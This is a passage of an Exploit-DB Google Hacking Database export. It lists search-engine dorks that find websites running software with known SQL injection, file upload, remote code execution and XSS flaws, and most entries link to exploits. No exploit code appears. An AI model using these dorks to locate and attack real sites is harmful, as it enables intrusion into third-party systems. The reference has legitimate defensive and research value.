<query>inurl:&quot;.php?cat=&quot; inurl:&quot;'&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;.php?cat=&quot; inurl:&quot;'&quot;</querystring>
<edb></edb>
<date>2017-04-06</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>4423</id>
<link>https://www.exploit-db.com/ghdb/4423</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/admin/index.php?msg=&quot; inurl:&quot;%20&quot;</shortDescription>
<textualDescription>Finds pages that can be XSS'd and edited
e.g.: http://www.site.com/admin/index.php?msg=Click me!
Dxtroyer</textualDescription>
<query>inurl:&quot;/admin/index.php?msg=&quot; inurl:&quot;%20&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/admin/index.php?msg=&quot; inurl:&quot;%20&quot;</querystring>
<edb></edb>
<date>2017-04-10</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>2326</id>
<link>https://www.exploit-db.com/ghdb/2326</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/alternate_profiles/&quot;</shortDescription>
<textualDescription>e107 Plugin alternate_profiles (id) SQL Injection Vulnerability - CVE: 2008-4785: https://www.exploit-db.com/exploits/6849</textualDescription>
<query>inurl:&quot;/alternate_profiles/&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22/alternate_profiles/%22</querystring>
<edb>https://www.exploit-db.com/exploits/6849</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>728</id>
<link>https://www.exploit-db.com/ghdb/728</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/cgi-bin/loadpage.cgi?user_id=&quot;</shortDescription>
<textualDescription>Description:EZshopper is a full-featured shopping cart program. loadpage.cgi of EZshopper allows Directory Traversal http://www.securityfocus.com/bid/2109</textualDescription>
<query>inurl:&quot;/cgi-bin/loadpage.cgi?user_id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22%2Fcgi-bin%2Floadpage.cgi%3Fuser_id%3D%22&amp;btnG=Google-Suche</querystring>
<edb></edb>
<date>2004-11-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>1576</id>
<link>https://www.exploit-db.com/ghdb/1576</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/cgi-bin/ourspace/&quot;</shortDescription>
<textualDescription>Ourspace 2.0.9 (uploadmedia.cgi) Remote File Upload Vulnerability - CVE: 2007-4647: https://www.exploit-db.com/exploits/4343</textualDescription>
<query>inurl:&quot;/cgi-bin/ourspace/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/cgi-bin/ourspace/%22</querystring>
<edb>https://www.exploit-db.com/exploits/4343</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2942</id>
<link>https://www.exploit-db.com/ghdb/2942</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/CMS/page.php?p=&quot;</shortDescription>
<textualDescription>Schweizer NISADA Communication CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10543</textualDescription>
<query>inurl:&quot;/CMS/page.php?p=&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22%2FCMS%2Fpage.php%3Fp%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/10543</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6772</id>
<link>https://www.exploit-db.com/ghdb/6772</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/console/login/LoginForm.jsp&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/console/login/LoginForm.jsp&quot;
# Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated). CVE-2020 14882.
# https://www.exploit-db.com/exploits/49479
# Date: 28/1/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;/console/login/LoginForm.jsp&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/console/login/LoginForm.jsp&quot;</querystring>
<edb></edb>
<date>2021-02-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5995</id>
<link>https://www.exploit-db.com/ghdb/5995</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/course/jumpto.php?jump=&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/course/jumpto.php?jump=&quot;
# Moodle 3.4.1 - Remote Code Execution. This dork is linked to the
following existing exploit: https://www.exploit-db.com/exploits/46551
# Date: 2/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;/course/jumpto.php?jump=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/course/jumpto.php?jump=&quot;</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1698</id>
<link>https://www.exploit-db.com/ghdb/1698</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/files/redirect.asp&quot;</shortDescription>
<textualDescription>JBS v2.0 | JBSX - Administration panel bypass and Malicious File Upload Vulnerability: https://www.exploit-db.com/exploits/10161</textualDescription>
<query>inurl:&quot;/files/redirect.asp&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/files/redirect.asp%22</querystring>
<edb>https://www.exploit-db.com/exploits/10161</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3661</id>
<link>https://www.exploit-db.com/ghdb/3661</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/gadmin/index.php&quot;</shortDescription>
<textualDescription>Author: AtT4CKxT3rR0r1ST SQL Injection: www.site.com/gallery.php?id=null[Sql Injection]</textualDescription>
<query>inurl:&quot;/gadmin/index.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/gadmin/index.php&quot;</querystring>
<edb></edb>
<date>2011-01-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>2274</id>
<link>https://www.exploit-db.com/ghdb/2274</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/geeklog/&quot;</shortDescription>
<textualDescription>GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability: https://www.exploit-db.com/exploits/15277</textualDescription>
<query>inurl:&quot;/geeklog/&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22/geeklog/%22</querystring>
<edb>https://www.exploit-db.com/exploits/15277</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1887</id>
<link>https://www.exploit-db.com/ghdb/1887</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/go/_files/?file=&quot;</shortDescription>
<textualDescription>SOTEeSKLEP 3.5RC9 (file) Remote File Disclosure Vulnerability - CVE: 2007-4369: https://www.exploit-db.com/exploits/4282</textualDescription>
<query>inurl:&quot;/go/_files/?file=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/go/_files/%3Ffile%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/4282</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2099</id>
<link>https://www.exploit-db.com/ghdb/2099</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/index.php?m=&quot; &quot;PHPRecipeBook 2.39&quot;</shortDescription>
<textualDescription>PHPRecipeBook 2.39 (course_id) Remote SQL Injection Vulnerability - CVE: 2009-4883: https://www.exploit-db.com/exploits/8330</textualDescription>
<query>inurl:&quot;/index.php?m=&quot; &quot;PHPRecipeBook 2.39&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/index.php%3Fm%3D%22+%22PHPRecipeBook+2.39%22</querystring>
<edb>https://www.exploit-db.com/exploits/8330</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2389</id>
<link>https://www.exploit-db.com/ghdb/2389</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/index.php?option=com_rsfiles&quot;</shortDescription>
<textualDescription>Joomla Component RSfiles 1.0.2 (path) File Download Vulnerability - CVE: 2007-4504: https://www.exploit-db.com/exploits/4307</textualDescription>
<query>inurl:&quot;/index.php?option=com_rsfiles&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/index.php%3Foption%3Dcom_rsfiles%22</querystring>
<edb>https://www.exploit-db.com/exploits/4307</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1582</id>
<link>https://www.exploit-db.com/ghdb/1582</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/k12.tr/?part=&quot;</shortDescription>
<textualDescription>Okul Otomasyon Portal 2.0 Remote SQL Injection Vulnerability - CVE: 2007-5490: https://www.exploit-db.com/exploits/4539</textualDescription>
<query>inurl:&quot;/k12.tr/?part=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/k12.tr/%3Fpart%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/4539</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6852</id>
<link>https://www.exploit-db.com/ghdb/6852</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/lib/editor/atto/plugins/managefiles/&quot; | inurl:&quot;calendar/view.php?view=month&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/lib/editor/atto/plugins/managefiles/&quot; | inurl:&quot;calendar/view.php?view=month&quot;
# Moodle 3.10.3 - 'label' Persistent Cross Site Scripting.
# https://www.exploit-db.com/exploits/49714
# Date: 26/3/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;/lib/editor/atto/plugins/managefiles/&quot; | inurl:&quot;calendar/view.php?view=month&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/lib/editor/atto/plugins/managefiles/&quot; | inurl:&quot;calendar/view.php?view=month&quot;</querystring>
<edb></edb>
<date>2021-03-29</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4445</id>
<link>https://www.exploit-db.com/ghdb/4445</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/load.cgi&quot; ext:cgi</shortDescription>
<textualDescription>Finds more pages vulnerable to redirection
Dxtroyer</textualDescription>
<query>inurl:&quot;/load.cgi&quot; ext:cgi</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/load.cgi&quot; ext:cgi</querystring>
<edb></edb>
<date>2017-04-19</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>1024</id>
<link>https://www.exploit-db.com/ghdb/1024</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/login.asp?folder=&quot; &quot;Powered by: i-Gallery 3.3&quot;</shortDescription>
<textualDescription>i-Gallery 3.3 (and possibly older) is vulnerable to many things, including /../ traversals.http://www.packetstormsecurity.org/0506-exploits/igallery33.txt</textualDescription>
<query>inurl:&quot;/login.asp?folder=&quot; &quot;Powered by: i-Gallery 3.3&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22%2Flogin.asp%3Ffolder%3D%22+%22Powered+by%3A+i-Gallery+3.3%22</querystring>
<edb></edb>
<date>2005-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>3672</id>
<link>https://www.exploit-db.com/ghdb/3672</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/modules.php?name=&quot; &quot;Maximus CMS&quot;</shortDescription>
<textualDescription>Maximus CMS (FCKeditor) File Upload Vulnerability
https://www.exploit-db.com/exploits/15960
Author: eidelweiss</textualDescription>
<query>inurl:&quot;/modules.php?name=&quot; &quot;Maximus CMS&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/modules.php?name=&quot; &quot;Maximus CMS&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/15960</edb>
<date>2011-01-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>3227</id>
<link>https://www.exploit-db.com/ghdb/3227</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/modules/friendfinder/&quot;</shortDescription>
<textualDescription>XOOPS Module Friendfinder</textualDescription>
<query>inurl:&quot;/modules/friendfinder/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/modules/friendfinder/%22</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3285</id>
<link>https://www.exploit-db.com/ghdb/3285</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/modules/glossaire/&quot;</shortDescription>
<textualDescription>XOOPS Module Glossarie</textualDescription>
<query>inurl:&quot;/modules/glossaire/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/modules/glossaire/%22</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3240</id>
<link>https://www.exploit-db.com/ghdb/3240</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/modules/jobs/&quot;</shortDescription>
<textualDescription>XOOPS Module Jobs 2.4 (cid) Remote SQL Injection - CVE: 2007-2370: https://www.exploit-db.com/exploits/3672</textualDescription>
<query>inurl:&quot;/modules/jobs/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/modules/jobs/%22</querystring>
<edb>https://www.exploit-db.com/exploits/3672</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3263</id>
<link>https://www.exploit-db.com/ghdb/3263</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/modules/library/&quot;</shortDescription>
<textualDescription>XOOPS Module Library (viewcat.php) Remote SQL Injectio - CVE: 2007-1815: https://www.exploit-db.com/exploits/3619</textualDescription>
<query>inurl:&quot;/modules/library/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/modules/library/%22</querystring>
<edb>https://www.exploit-db.com/exploits/3619</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3246</id>
<link>https://www.exploit-db.com/ghdb/3246</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/modules/myads/&quot;</shortDescription>
<textualDescription>XOOPS Module MyAds Bug Fix 2.04jp (index.php) SQL Injection - CVE: 2007-1846: https://www.exploit-db.com/exploits/3603</textualDescription>
<query>inurl:&quot;/modules/myads/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/modules/myads/%22</querystring>
<edb>https://www.exploit-db.com/exploits/3603</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3287</id>
<link>https://www.exploit-db.com/ghdb/3287</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/modules/myconference/&quot;</shortDescription>
<textualDescription>XOOPS Module MyConference 1.0 (index.php) SQL Injection - CVE: 2007-2737: https://www.exploit-db.com/exploits/3933</textualDescription>
<query>inurl:&quot;/modules/myconference/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/modules/myconference/%22</querystring>
<edb>https://www.exploit-db.com/exploits/3933</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3264</id>
<link>https://www.exploit-db.com/ghdb/3264</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/modules/repository/&quot;</shortDescription>
<textualDescription>XOOPS Module Repository (viewcat.php) Remote SQL Injection - CVE: 2007-1847: https://www.exploit-db.com/exploits/3612</textualDescription>
<query>inurl:&quot;/modules/repository/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/modules/repository/%22</querystring>
<edb>https://www.exploit-db.com/exploits/3612</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3296</id>
<link>https://www.exploit-db.com/ghdb/3296</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/modules/wfsection/&quot;</shortDescription>
<textualDescription>https://www.exploit-db.com/exploits/3644/</textualDescription>
<query>inurl:&quot;/modules/wfsection/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/modules/wfsection/%22</querystring>
<edb>https://www.exploit-db.com/exploits/3644</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3279</id>
<link>https://www.exploit-db.com/ghdb/3279</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/modules/zmagazine/&quot;</shortDescription>
<textualDescription>XOOPS Module Zmagazine 1.0 (print.php) Remote SQL Injection - CVE: 2005-0725: https://www.exploit-db.com/exploits/3646</textualDescription>
<query>inurl:&quot;/modules/zmagazine/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/modules/zmagazine/%22</querystring>
<edb>https://www.exploit-db.com/exploits/3646</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1702</id>
<link>https://www.exploit-db.com/ghdb/1702</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/plugins/ImageManager/manager.php&quot;</shortDescription>
<textualDescription>Wordpress Image Manager Plugins Shell Upload Vulnerability: https://www.exploit-db.com/exploits/10325</textualDescription>
<query>inurl:&quot;/plugins/ImageManager/manager.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/plugins/ImageManager/manager.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/10325</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3678</id>
<link>https://www.exploit-db.com/ghdb/3678</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/plugins/ImageManager/manager.php&quot;</shortDescription>
<textualDescription>Author: PenetraDz Shell Upload Vuln: manager/media/editor/plugins/ImageManager/manager.php</textualDescription>
<query>inurl:&quot;/plugins/ImageManager/manager.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22%2Fplugins%2FImageManager%2Fmanager.php%22</querystring>
<edb></edb>
<date>2011-01-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>2706</id>
<link>https://www.exploit-db.com/ghdb/2706</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/rbfminc/&quot;</shortDescription>
<textualDescription>RogioBiz_PHP_file_manager_V1.2 bypass admin: https://www.exploit-db.com/exploits/11731</textualDescription>
<query>inurl:&quot;/rbfminc/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/rbfminc/%22</querystring>
<edb>https://www.exploit-db.com/exploits/11731</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3774</id>
<link>https://www.exploit-db.com/ghdb/3774</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/showPlayer.php?id=&quot; intext:&quot;powered by ellistonSPORT&quot;</shortDescription>
<textualDescription>ellistonSPORT Remote SQL Injection Vulnerability. Author: ITTIHACK</textualDescription>
<query>inurl:&quot;/showPlayer.php?id=&quot; intext:&quot;powered by ellistonSPORT&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/showPlayer.php?id=&quot; intext:&quot;powered by ellistonSPORT&quot;</querystring>
<edb></edb>
<date>2012-01-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>613</id>
<link>https://www.exploit-db.com/ghdb/613</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/site/articles.asp?idcategory=&quot;</shortDescription>
<textualDescription>Dwc_Articles is an ASP application designed to add Featured, Recent and Popular News through an easy to use administration area. Other features: Design Packages, Add, Modify, Deactive through HTML/Wysiwyg Editor, Nearly all scripts suffer from possible sql injections. http://www.securityfocus.com/bid/11509</textualDescription>
<query>inurl:&quot;/site/articles.asp?idcategory=&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22%2Fsite%2Farticles.asp%3Fidcategory%3D%22+&amp;btnG=Google-Suche</querystring>
<edb></edb>
<date>2004-10-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1641</id>
<link>https://www.exploit-db.com/ghdb/1641</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/squirrelcart/&quot; -squirrelcart.com</shortDescription>
<textualDescription>Squirrelcart 1.x.x (cart.php) Remote File Inclusion Vulnerability - CVE: 2007-4439: https://www.exploit-db.com/exploits/4295</textualDescription>
<query>inurl:&quot;/squirrelcart/&quot; -squirrelcart.com</query>
<querystring>https://www.google.com/search?q=inurl:%22/squirrelcart/%22+-squirrelcart.com</querystring>
<edb>https://www.exploit-db.com/exploits/4295</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2084</id>
<link>https://www.exploit-db.com/ghdb/2084</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/tagit2b/&quot;</shortDescription>
<textualDescription>TagIt! Tagboard 2.1.b b2 (index.php) Remote File Include Vulnerability - CVE: 2006-5093: https://www.exploit-db.com/exploits/2450</textualDescription>
<query>inurl:&quot;/tagit2b/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/tagit2b/%22</querystring>
<edb>https://www.exploit-db.com/exploits/2450</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4610</id>
<link>https://www.exploit-db.com/ghdb/4610</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/testssi.ssi&quot;</shortDescription>
<textualDescription>*Google dork description: *Xitami servers distributed with a script for
testing server-side includes, '/testssi.ssi'. This script is vulnerable to
a cross-site scripting issue when sent a request with a malformed Host or
User-Agent header. An attacker may exploit this flaw the steal the
authentication credentials of third-party users.
*Google Search: *inurl:&quot;/testssi.ssi&quot;
*Submitted by:* Alfie_the-infosec_
</textualDescription>
<query>inurl:&quot;/testssi.ssi&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/testssi.ssi&quot;</querystring>
<edb></edb>
<date>2017-11-03</date>
<author>Alfie</author>
</entry>
<entry>
<id>4991</id>
<link>https://www.exploit-db.com/ghdb/4991</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/uddiexplorer/searchpublicregistries.jsp&quot;</shortDescription>
<textualDescription>Category: Page containing log in portal &amp; Web Server Detection
Description: This dork allows user to access default page of Oracle
Weblogic Server - UDDI Explorer. Some of scanner tools would detect SSRF
vulnerability for weblogic uddi explorer. Moreover, there is a flaw
regarding the weblogic server version which vulnerables to XSS.
Reference:
https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
Author: Zulfikar Azhari
</textualDescription>
<query>inurl:&quot;/uddiexplorer/searchpublicregistries.jsp&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/uddiexplorer/searchpublicregistries.jsp&quot;</querystring>
<edb></edb>
<date>2018-10-17</date>
<author>Zulfikar Azhari</author>
</entry>
<entry>
<id>6452</id>
<link>https://www.exploit-db.com/ghdb/6452</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/vam/index_vam_op.php&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/vam/index_vam_op.php&quot;
# Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting. This
dork is linked to the following existing exploit:
https://www.exploit-db.com/exploits/48715
# Date: 27/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;/vam/index_vam_op.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/vam/index_vam_op.php&quot;</querystring>
<edb></edb>
<date>2020-07-27</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4287</id>
<link>https://www.exploit-db.com/ghdb/4287</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/webmail/&quot; intitle:&quot;Mail - AfterLogic WebMail&quot; -site:afterlogic.org -site:afterlogic.com</shortDescription>
<textualDescription>inurl:&quot;/webmail/&quot; intitle:&quot;Mail - AfterLogic WebMail&quot; -site:afterlogic.org -site:afterlogic.com
AfterLogic WebMail
XXE Injection Vulnerability
https://www.exploit-db.com/exploits/39850/
Decoy</textualDescription>
<query>inurl:&quot;/webmail/&quot; intitle:&quot;Mail - AfterLogic WebMail&quot; -site:afterlogic.org -site:afterlogic.com</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/webmail/&quot; intitle:&quot;Mail - AfterLogic WebMail&quot; -site:afterlogic.org -site:afterlogic.com</querystring>
<edb>https://www.exploit-db.com/exploits/39850</edb>
<date>2016-05-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>4567</id>
<link>https://www.exploit-db.com/ghdb/4567</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/wp-admin/setup-config.php&quot; intitle:&quot;Setup Configuration File&quot;</shortDescription>
<textualDescription>Finds Wordpress unfinished installations.
Like published at defcon:
https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Hanno-Boeck-Abusing-Certificate-Transparency-Logs.pdf
Dork:
inurl:&quot;/wp-admin/setup-config.php&quot; intitle:&quot;Setup Configuration File&quot;
B0x41S
X-ray IT</textualDescription>
<query>inurl:&quot;/wp-admin/setup-config.php&quot; intitle:&quot;Setup Configuration File&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/wp-admin/setup-config.php&quot; intitle:&quot;Setup Configuration File&quot;</querystring>
<edb></edb>
<date>2017-08-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>6979</id>
<link>https://www.exploit-db.com/ghdb/6979</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/wp-content/plugins/123ContactForm</shortDescription>
<textualDescription># Dork: inurl:&quot;/wp-content/plugins/123ContactForm&quot;
#Author: Rutvik Jaini
#references: https://wpscan.com/vulnerability/ce716e4f-60f8-42e3-8891-a38e7948b970
https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html
DescriptionThe cfp-connect AJAX call uses user input controlled data to
perform the signature verification, attackers could craft these values
($message, $signature, $cf_pub_key) to bypass the validation mechanisms and
inject their own public_key into the database.
POC:
</textualDescription>
<query>inurl:&quot;/wp-content/plugins/123ContactForm</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/wp-content/plugins/123ContactForm</querystring>
<edb></edb>
<date>2021-06-01</date>
<author>Rutvik Jaini</author>
</entry>
<entry>
<id>6776</id>
<link>https://www.exploit-db.com/ghdb/6776</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/wp-content/plugins/super-forms/&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/wp-content/plugins/super-forms/&quot;
# WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code
# Execution. https://www.exploit-db.com/exploits/49490
# Date: 3/2/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;/wp-content/plugins/super-forms/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/wp-content/plugins/super-forms/&quot;</querystring>
<edb></edb>
<date>2021-02-05</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6533</id>
<link>https://www.exploit-db.com/ghdb/6533</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php&quot; - Wordpress File Manager</shortDescription>
<textualDescription>dork: inurl:&quot;/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php&quot;
Author: bt0
references:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213
https://wpvulndb.com/vulnerabilities/10389
Description:
Seravo noticed multiple cases where WordPress sites were breached using 0-day in wp-file-manager (confirmed with v6.8, which was the latest version available in wordpress.org).
File lib/php/connector.minimal.php can be by default opened directly, and this file loads lib/php/elFinderConnector.class.php which reads POST/GET variables, and then allows executing some internal features, like uploading files. PHP is allowed, thus this leads to unauthenticated arbitrary file upload and remote code execution.
It seems that this vulnerability was originally discovered and published publicly on Twitter on August 26th (see references), and was later seen being exploited in the wild by Seravo.
Best regards,
bt0</textualDescription>
<query>inurl:&quot;/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php&quot; - Wordpress File Manager</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php&quot; - Wordpress File Manager</querystring>
<edb></edb>
<date>2020-09-11</date>
<author>bt0</author>
</entry>
<entry>
<id>4296</id>
<link>https://www.exploit-db.com/ghdb/4296</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/wp-content/plugins/wp-mobile-detector/&quot; ext:php</shortDescription>
<textualDescription>WP Mobile Detector 3.5 Remote Shell Upload
https://www.exploit-db.com/exploits/39891/
inurl:&quot;/wp-content/plugins/wp-mobile-detector/&quot; ext:php
Decoy</textualDescription>
<query>inurl:&quot;/wp-content/plugins/wp-mobile-detector/&quot; ext:php</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/wp-content/plugins/wp-mobile-detector/&quot; ext:php</querystring>
<edb>https://www.exploit-db.com/exploits/39891</edb>
<date>2016-06-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>3148</id>
<link>https://www.exploit-db.com/ghdb/3148</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;/wp-content/plugins/wp-shopping-cart/&quot;</shortDescription>
<textualDescription>Wordpress Plugin e-Commerce</textualDescription>
<query>inurl:&quot;/wp-content/plugins/wp-shopping-cart/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/wp-content/plugins/wp-shopping-cart/%22</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4298</id>
<link>https://www.exploit-db.com/ghdb/4298</link>
<category>Advisories and Vulnerabilities</category>
